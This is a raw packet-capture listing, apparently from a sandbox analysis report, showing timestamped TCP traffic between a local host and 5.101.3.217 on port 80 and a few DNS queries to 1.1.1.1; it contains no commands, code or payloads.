                                Dec 27, 2024 08:46:25.356924057 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:25.356957912 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.356970072 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.357037067 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.357115984 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:25.357126951 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.357171059 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:25.357196093 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.357220888 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.357242107 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:25.357261896 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:25.357342958 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.357356071 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.357398033 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:25.357415915 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:25.357527971 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.357547998 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.357604980 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:25.357657909 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.357708931 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.357714891 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:25.357754946 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:25.357815981 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.357907057 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.357996941 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.358088017 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.358211994 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.358288050 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.358397007 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.358510017 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.358560085 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.358688116 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.358725071 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.358813047 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.358901024 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.358967066 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.358995914 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.359080076 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.359154940 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.359236956 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.360965967 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:25.401251078 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.401310921 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:25.476618052 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.476706982 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:25.476948023 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.476998091 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:25.477489948 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.477530956 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.477540970 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:25.477734089 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.477858067 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.478037119 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.478219032 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.478297949 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.478430986 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.478610992 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.478853941 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.478956938 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.479027033 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.479103088 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.479376078 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:25.480704069 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.480762959 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:25.480778933 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.480832100 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:25.480916977 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.480951071 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.480966091 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:25.480998039 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:25.481089115 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.481138945 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:25.481167078 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.481210947 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:25.481323957 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.481334925 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.481375933 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:25.481395006 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:25.481493950 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.481534958 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.481544971 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:25.481581926 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:25.481735945 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.481746912 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.481795073 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:25.481878042 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.481888056 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.482002974 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.482114077 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.482207060 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.482217073 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.482337952 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.482357025 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.482480049 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.482539892 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.482812881 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.482822895 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.482947111 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.482964993 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.483048916 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.483082056 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.483233929 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.483269930 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.483427048 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.483455896 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.483577013 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.483587980 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.483696938 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.483738899 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.483874083 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.483887911 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.484056950 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.484069109 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.484211922 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.484303951 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.484380960 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.484426022 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.484565973 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.484576941 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.484711885 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.521014929 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.596301079 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.596322060 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.596533060 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.596599102 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.596987009 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.597143888 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.597558975 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:25.597665071 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:25.599045038 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.599101067 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.599111080 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.599170923 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.599230051 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.599368095 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.599488020 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.599497080 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.599505901 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.599587917 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.599642992 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.599714041 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.599737883 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.599817991 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.599837065 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.599927902 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.599946022 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.600061893 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.600123882 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.600250959 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.600321054 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.600374937 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.600491047 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.600632906 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.600642920 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.600713015 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.600729942 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.600840092 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.600889921 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.601031065 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.601041079 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.601147890 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.601157904 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.601325035 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.601335049 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.601401091 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.601421118 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.601547003 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.601648092 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.601735115 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.601779938 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.601855993 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.601870060 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.601950884 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.601962090 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.602034092 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.602088928 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.602125883 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.602193117 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.602276087 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.602294922 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.602426052 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.602469921 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.602482080 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.602787018 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:25.602859974 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:25.717276096 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.717293978 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.717386007 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.717417002 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.717485905 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.717534065 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.717613935 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.717662096 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.717770100 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.717802048 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.717864990 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.717914104 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.717987061 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.717997074 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.718069077 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.718122005 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.718194962 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.718247890 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.718334913 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.718353033 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.718435049 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.718498945 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.718596935 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.718606949 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.718722105 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.718734026 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.718842983 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.718853951 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.718882084 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.718940020 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.719043016 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.719053030 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.719124079 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.719168901 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.719218016 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.719270945 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.719322920 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.719369888 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.719444036 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.719461918 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.719542027 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.719561100 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.719671011 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.719690084 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.719783068 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.719794035 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.719876051 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.719893932 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.719999075 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.720010042 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.720098972 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.720108032 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.720215082 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.720225096 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.720529079 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:25.722397089 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.722486973 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.722507954 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.722593069 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.722603083 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.722639084 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.722722054 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.722810984 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.722830057 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.722946882 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.722965956 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.723057985 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.723076105 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.723210096 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.723227978 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.723356009 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.723408937 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.723587990 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.723607063 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.723728895 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.723747015 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.723835945 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.723875999 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.723918915 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.724035978 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.724047899 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.724081039 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.724157095 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.724168062 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.724260092 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.724296093 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.724360943 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.724395990 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.724489927 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.724499941 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.724579096 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.724590063 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.724708080 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.724716902 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.724781990 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.724801064 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.724868059 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.724963903 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.724973917 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.725007057 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.725075960 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.725090027 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.725193977 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.725204945 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.725291014 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.725301981 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.725385904 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.725418091 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.725511074 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.840315104 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.840331078 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.840513945 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.840526104 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.840651989 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.840697050 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.841011047 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.841022968 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.841197014 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.841207981 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.841340065 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.841389894 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.841507912 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.841640949 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.841742992 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.841753006 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.841850996 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.841968060 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.842185974 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.842195034 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.842284918 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.842308998 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.842408895 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.842427015 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.842535019 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.842607021 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.842722893 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.842732906 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.842778921 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.842843056 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.842926979 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.842947006 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.843067884 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.843132019 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.843142033 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:27.998560905 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:27.998584032 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:27.998680115 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:27.999133110 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:28.118603945 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:28.203485966 CET4972180192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:28.323080063 CET80497215.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:28.323223114 CET4972180192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:28.323616982 CET4972180192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:28.443041086 CET80497215.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:29.896974087 CET80497215.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:29.897094965 CET80497215.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:29.897149086 CET4972180192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:29.897572041 CET4972180192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:30.017033100 CET80497215.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:30.113591909 CET4972780192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:30.233124018 CET80497275.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:30.233340025 CET4972780192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:30.233782053 CET4972780192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:30.353225946 CET80497275.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:31.787430048 CET80497275.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:31.787621975 CET80497275.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:31.787698984 CET4972780192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:31.788024902 CET4972780192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:31.907466888 CET80497275.101.3.217192.168.2.6

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Dec 27, 2024 08:46:19.479916096 CET6231353192.168.2.61.1.1.1
                                Dec 27, 2024 08:46:19.480072021 CET6231353192.168.2.61.1.1.1
                                Dec 27, 2024 08:46:19.617466927 CET53623131.1.1.1192.168.2.6
                                Dec 27, 2024 08:46:19.617517948 CET53623131.1.1.1192.168.2.6
                                Dec 27, 2024 08:46:23.964118958 CET5522953192.168.2.61.1.1.1
                                Dec 27, 2024 08:46:23.964215994 CET5522953192.168.2.61.1.1.1
                                Dec 27, 2024 08:46:24.103250027 CET53552291.1.1.1192.168.2.6
                                Dec 27, 2024 08:46:24.103276014 CET53552291.1.1.1192.168.2.6
                                Dec 27, 2024 08:46:28.063817024 CET5523153192.168.2.61.1.1.1
                                Dec 27, 2024 08:46:28.063894033 CET5523153192.168.2.61.1.1.1
                                Dec 27, 2024 08:46:28.202284098 CET53552311.1.1.1192.168.2.6
